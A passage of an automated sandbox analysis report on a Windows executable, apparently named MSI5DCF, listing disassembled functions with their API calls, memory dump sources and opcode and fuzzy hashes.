                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00B13EC1,00000002,00000000,?,?,?,00B13EC1,?,00000000), ref: 00B13C65
                                                                        • GetACP.KERNEL32(?,?,00B13EC1,?,00000000), ref: 00B13C7A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: c52725c34343ce01524da798668fe4428781076628e275d44993754cfd94d8a6
                                                                        • Instruction ID: 1868e992214a9b54edd29885c2a980d45955cb7d23c6383d923afaafdf5d4bf1
                                                                        • Opcode Fuzzy Hash: c52725c34343ce01524da798668fe4428781076628e275d44993754cfd94d8a6
                                                                        • Instruction Fuzzy Hash: A3213D72704201BADB248F69D941AD7B6E6EB54F64BE684E4E90AE7110F732DF81C390
                                                                        Function 00B13D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B13E84
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00B13ECD
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00B13EDC
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B13F24
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B13F43
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        • Opcode ID: 8ec1c0f171583d470abd43b29a366562b44024f626d469d534cde98bfedeb4f3
                                                                        • Instruction ID: 1dc21fcf93f1c9d4b0049f3af1868cf4915c596d8cafdbe7e9ec2ca75eb32b06
                                                                        • Opcode Fuzzy Hash: 8ec1c0f171583d470abd43b29a366562b44024f626d469d534cde98bfedeb4f3
                                                                        • Instruction Fuzzy Hash: 65514E72A00305ABDF10EFA5DC45AEA77F8FF44B00F9445A9E905E7190FB709B848B61
                                                                        Function 00B0B336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction ID: ff1799b8d299bbfee4e0b793576affaa294c73bb221daf580794f1cc80cd4270
                                                                        • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                        • Instruction Fuzzy Hash: 5DB113729042459FDB158F68C8A1FEEBFE5EF59310F1481EAE805AB382D7359D01CBA0
                                                                        Function 00B1069D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00B10738
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B107B3
                                                                        • FindClose.KERNEL32(00000000), ref: 00B107D5
                                                                        • FindClose.KERNEL32(00000000), ref: 00B107F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1164774033-0
                                                                        • Opcode ID: 7cabf6a954279bee16f37dcfa7313ae2c7f570688ccfa42e6d79133f1bfd4736
                                                                        • Instruction ID: c2596d00503930e2cf4f5c165c288770a52489ac38148bb2bb8999c702e3d9ba
                                                                        • Opcode Fuzzy Hash: 7cabf6a954279bee16f37dcfa7313ae2c7f570688ccfa42e6d79133f1bfd4736
                                                                        • Instruction Fuzzy Hash: 62418171910229AEDB20FF68CC89AEEB3F9EB85304F9441D5E405D7185EAB09EC0CF50
                                                                        Function 00AF83BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AF83C9
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00AF8495
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AF84B5
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00AF84BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 02fcdf3e89a9fdc9c0bc2bb947555b755e867d7679f74cf07fb49a7110750009
                                                                        • Instruction ID: 533347a47ba86e7626ae64748ac90d06de0eb3fb5d1143c3d2900fd142401800
                                                                        • Opcode Fuzzy Hash: 02fcdf3e89a9fdc9c0bc2bb947555b755e867d7679f74cf07fb49a7110750009
                                                                        • Instruction Fuzzy Hash: CE312775D0121C9BDF20EFA4DD89BDDBBB8AF08300F5041AAE50DAB250EB759A848F44
                                                                        Function 00AE2161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00AD3270,?), ref: 00AE2176
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,B7207CF4,00000000,00000000,00000000,00000000,?,?,?,00AD3270,?), ref: 00AE2198
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FormatInfoLocaleMessage
                                                                        • String ID: !x-sys-default-locale
                                                                        • API String ID: 4235545615-2729719199
                                                                        • Opcode ID: 89a38f8bd9f9f607604252a93c456512932bfabe22944eb5966d094575fd9228
                                                                        • Instruction ID: 721f76803a5eaa9ddabe1105c5234929101d891fa2d9b31406fbc9dd90eca8df
                                                                        • Opcode Fuzzy Hash: 89a38f8bd9f9f607604252a93c456512932bfabe22944eb5966d094575fd9228
                                                                        • Instruction Fuzzy Hash: F5E039B6150118BEEB149FA0CC0BEEA7BADEB04790F008114BD05E2190E6B0AE408BA0
                                                                        Function 00B13827 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B1387B
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B138C5
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B1398B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 661929714-0
                                                                        • Opcode ID: 56fbe49605d4a3722477a0028ffe436152b59836172d6ffa990f282b67b29549
                                                                        • Instruction ID: 550b3c395ee047d4e296d6b8a18a59c3d86919acc80782b97f985bb30549e30c
                                                                        • Opcode Fuzzy Hash: 56fbe49605d4a3722477a0028ffe436152b59836172d6ffa990f282b67b29549
                                                                        • Instruction Fuzzy Hash: E261A271A102079BDB249F28CC86BFAB7E8EF05B40F5480E9E906D6185F775DAC5CB50
                                                                        Function 00AFC3B6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AFC4AE
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AFC4B8
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFC4C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: 53618520ec771d9db03bc8a05bde40d9130a56a1f9d04735b71ffdb99bdbca12
                                                                        • Instruction ID: 0bc64c0eace4f3da05e8c52977d0e22871ac2b28c5595be156f48f7809923406
                                                                        • Opcode Fuzzy Hash: 53618520ec771d9db03bc8a05bde40d9130a56a1f9d04735b71ffdb99bdbca12
                                                                        • Instruction Fuzzy Hash: 3E31B27490122CABCB21DF65D98979DBBB8BF08310F5081EAF50CA7251EB749F858F44
                                                                        Function 00AD1D70 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadResource.KERNEL32(00000000,00000000,B7207CF4,00000001,00000000,?,00000000,00B19360,000000FF,?,00AD1D1C,00000010,?,?,?,-00000010), ref: 00AD1D9B
                                                                        • LockResource.KERNEL32(00000000,?,00AD1D1C,00000010,?,?,?,-00000010,00B19340,000000FF,?,00AD202C,?,00000000,00B1938D,000000FF), ref: 00AD1DA6
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00AD1D1C,00000010,?,?,?,-00000010,00B19340,000000FF,?,00AD202C,?,00000000,00B1938D), ref: 00AD1DB4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$LoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 2853612939-0
                                                                        • Opcode ID: 0a1c88bda347afacdc7df8fcd7eafebc52f5aa25faa1b0e7d2af765deeaf192b
                                                                        • Instruction ID: 60b499f5831f9e1971adc626d28405833aa073f0dd860e699e1844df13fe69c2
                                                                        • Opcode Fuzzy Hash: 0a1c88bda347afacdc7df8fcd7eafebc52f5aa25faa1b0e7d2af765deeaf192b
                                                                        • Instruction Fuzzy Hash: FA11E732A00654ABC7249F19DC45BAAF7ECE789B10F40492BEC56D3340EB359D008690
                                                                        Function 00B038A0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
                                                                        • Instruction ID: af42f694db87d79f44f69ba9720b03cc0e6cd63a8686d32e33a019a347d296cf
                                                                        • Opcode Fuzzy Hash: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
                                                                        • Instruction Fuzzy Hash: A8F13F71E002199FDF14CF69C8846ADBBF5FF88724F1582A9E815AB390D731AE45CB90
                                                                        Function 00B0D192 Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B0D5D7,00000000,00000000,00000000), ref: 00B0D496
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 565725191-0
                                                                        • Opcode ID: 8806cc6fac762eb56653c789aa448ea76ebc2432b8ac3b0d46ff73b6ac52d7d7
                                                                        • Instruction ID: 65c2fbd1323095828e5afcddac9deb096d4491b431a8058d92f4e80cc8bb8615
                                                                        • Opcode Fuzzy Hash: 8806cc6fac762eb56653c789aa448ea76ebc2432b8ac3b0d46ff73b6ac52d7d7
                                                                        • Instruction Fuzzy Hash: A1D1E572900215AADB20AFE4DC42ABE7FF9EF14710F6540A6F905E72D1EB709E41CB94
                                                                        Function 00B0DB30 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B0DB2B,?,?,00000008,?,?,00B16AD4,00000000), ref: 00B0DD5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: f4ee5875562b019cce59b7ad83cc654e675451f529fe6977aee4c08744bd5169
                                                                        • Instruction ID: 13273d3b28e42d716d9269cef9e396a7bcfdebfe6983daffa3052d47851a38fe
                                                                        • Opcode Fuzzy Hash: f4ee5875562b019cce59b7ad83cc654e675451f529fe6977aee4c08744bd5169
                                                                        • Instruction Fuzzy Hash: DAB11A712106099FDB25CF68C48AB657FE0FF45364F258698E89ACF2E1C735E992CB40
                                                                        Function 00AF801C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AF8032
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 374b5696b2adb4d46f0d6cb7165e718a0e6898eca2b6a5b62e44b59722acedb7
                                                                        • Instruction ID: c123f86a17d599a7a0e030e7ed5625339e53c34371ec2758343920845f1d5461
                                                                        • Opcode Fuzzy Hash: 374b5696b2adb4d46f0d6cb7165e718a0e6898eca2b6a5b62e44b59722acedb7
                                                                        • Instruction Fuzzy Hash: 4D519EB1A11219CBDB19CFA5E8857AEB7F0FB48300F24816AE500EB250DB79EA04CF54
                                                                        Function 00AFFA8E Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: 015b81619f0d21ffff6312f8a9d81b485f96244bf2ecb9f869b0ae3c4d41f21d
                                                                        • Instruction ID: 19d3609e696b233eabc769581950c9936301e3b771cb1dc625546bdf0b8821dd
                                                                        • Opcode Fuzzy Hash: 015b81619f0d21ffff6312f8a9d81b485f96244bf2ecb9f869b0ae3c4d41f21d
                                                                        • Instruction Fuzzy Hash: 6FE1BC3060060D8FCB24DFA8C580ABEB7F1FF49314F248669F65A9B2A1D730AD42CB55
                                                                        Function 00AFF700 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: 019cd3350c58bc5b674743875f7145230c53436d9c6d2d943534e6725c77e5cd
                                                                        • Instruction ID: 85a17ef500d67ba8b3d367031985f9202b0dac25be4a2e93770094cead1031e6
                                                                        • Opcode Fuzzy Hash: 019cd3350c58bc5b674743875f7145230c53436d9c6d2d943534e6725c77e5cd
                                                                        • Instruction Fuzzy Hash: 95C1E07090064E8FCB28EFA8C480A7EFBF1AF45354F244679F696972A1D730AD45CB91
                                                                        Function 00B13A7A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B13ACE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 76560efab023b9dc001b4d1584e4e451831d8067994e8301005ebb6c904dc8b6
                                                                        • Instruction ID: 82a631c0492339ffe2fdc51a42143294628d28897dab4fbf79f3d735c3978d82
                                                                        • Opcode Fuzzy Hash: 76560efab023b9dc001b4d1584e4e451831d8067994e8301005ebb6c904dc8b6
                                                                        • Instruction Fuzzy Hash: DD21B372615256ABDB18AB25DC42EFB77E8EF44B10F5040BAF905D6181FB34DE848750
                                                                        Function 00B13701 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B13827,00000001,00000000,?,-00000050,?,00B13E58,00000000,?,?,?,00000055,?), ref: 00B13773
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: 92967064135e8c6034085761a123a4cefb2bbd96de3ce25672b5a0a8c4e337e5
                                                                        • Instruction ID: e172b54010cd2775d174b75a134c59480b89f3a3a657a176575901c4058380f5
                                                                        • Opcode Fuzzy Hash: 92967064135e8c6034085761a123a4cefb2bbd96de3ce25672b5a0a8c4e337e5
